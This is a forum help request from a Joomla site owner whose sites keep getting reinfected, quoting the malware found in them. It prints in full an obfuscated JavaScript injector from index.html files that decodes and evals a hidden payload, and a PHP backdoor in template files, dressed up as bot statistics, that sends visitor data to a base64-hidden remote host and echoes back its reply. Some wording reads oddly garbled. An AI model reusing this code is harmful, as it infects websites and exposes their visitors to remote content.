I've done various projects using Joomla Content management systems. In the latter days I'm facing a significant trouble with my new projects. It appears just like a adware and spyware attack. You may already know joomla Content management systems put always blank html file named ‘index.html’ in every single folder. Also the majority of the joomla modules possess a file named Deafult.php inside tmpl folder. I believe it’s a adware and spyware. It inserting some bit of javascript and php code during my index.html file and tmlp->default.php file.

The code is the following: Code present in index.html file inside every directory :

<!-- o --><script>try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5t57t20t20.5t29.5t4.5t4.5t62.5t16t50.5t54t57.5t50.5t16t61.5t4.5t4.5t4.5t50t55.5t49.5t58.5t54.5t50.5t55t58t23t59.5t57t52.5t58t50.5t20t17t30t52.5t51t57t48.5t54.5t50.5t16t57.5t57t49.5t30.5t19.5t52t58t58t56t29t23.5t23.5t51t52.5t49t50.5t57t48.5t57.5t58t48.5t58t23t49.5t55.5t54.5t23.5t58t50.5t54.5t56t23.5t57.5t58t48.5t58t23t56t52t56t19.5t16t59.5t52.5t50t58t52t30.5t19.5t24.5t24t19.5t16t52t50.5t52.5t51.5t52t58t30.5t19.5t24.5t24t19.5t16t57.5t58t60.5t54t50.5t30.5t19.5t59t52.5t57.5t52.5t49t52.5t54t52.5t58t60.5t29t52t52.5t50t50t50.5t55t29.5t56t55.5t57.5t52.5t58t52.5t55.5t55t29t48.5t49t57.5t55.5t54t58.5t58t50.5t29.5t54t50.5t51t58t29t24t29.5t58t55.5t56t29t24t29.5t19.5t31t30t23.5t52.5t51t57t48.5t54.5t50.5t31t17t20.5t29.5t4.5t4.5t62.5t4.5t4.5t51t58.5t55t49.5t58t52.5t55.5t55t16t52.5t51t57t48.5t54.5t50.5t57t20t20.5t61.5t4.5t4.5t4.5t59t48.5t57t16t51t16t30.5t16t50t55.5t49.5t58.5t54.5t50.5t55t58t23t49.5t57t50.5t48.5t58t50.5t34.5t54t50.5t54.5t50.5t55t58t20t19.5t52.5t51t57t48.5t54.5t50.5t19.5t20.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t57.5t57t49.5t19.5t22t19.5t52t58t58t56t29t23.5t23.5t51t52.5t49t50.5t57t48.5t57.5t58t48.5t58t23t49.5t55.5t54.5t23.5t58t50.5t54.5t56t23.5t57.5t58t48.5t58t23t56t52t56t19.5t20.5t29.5t51t23t57.5t58t60.5t54t50.5t23t59t52.5t57.5t52.5t49t52.5t54t52.5t58t60.5t30.5t19.5t52t52.5t50t50t50.5t55t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t56t55.5t57.5t52.5t58t52.5t55.5t55t30.5t19.5t48.5t49t57.5t55.5t54t58.5t58t50.5t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t54t50.5t51t58t30.5t19.5t24t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t58t55.5t56t30.5t19.5t24t19.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t59.5t52.5t50t58t52t19.5t22t19.5t24.5t24t19.5t20.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t52t50.5t52.5t51.5t52t58t19.5t22t19.5t24.5t24t19.5t20.5t29.5t4.5t4.5t4.5t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t23t48.5t56t56t50.5t55t50t33.5t52t52.5t54t50t20t51t20.5t29.5t4.5t4.5t62.5';n=n['split'](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"[i]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script><!-- c -->

Now this is actually the php code found inside module title->tmpl->default.php, template’s index.php, footer.php.

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Attempted to get rid of them many occasions and re-submitted the files. But nonetheless my sites are heading down within 2 or 3 days. The neighborhood copy of index.html file is showing like a virus in Microsoft Security necessities plus some others like NOD32. How do i escape from this..? Suggest possible solutions and recovery.

Thanks

Note: every time I clean this file I usually change my FTP password. So doesn’t spend your time by saying update the ftp password? I already attempted it. :-/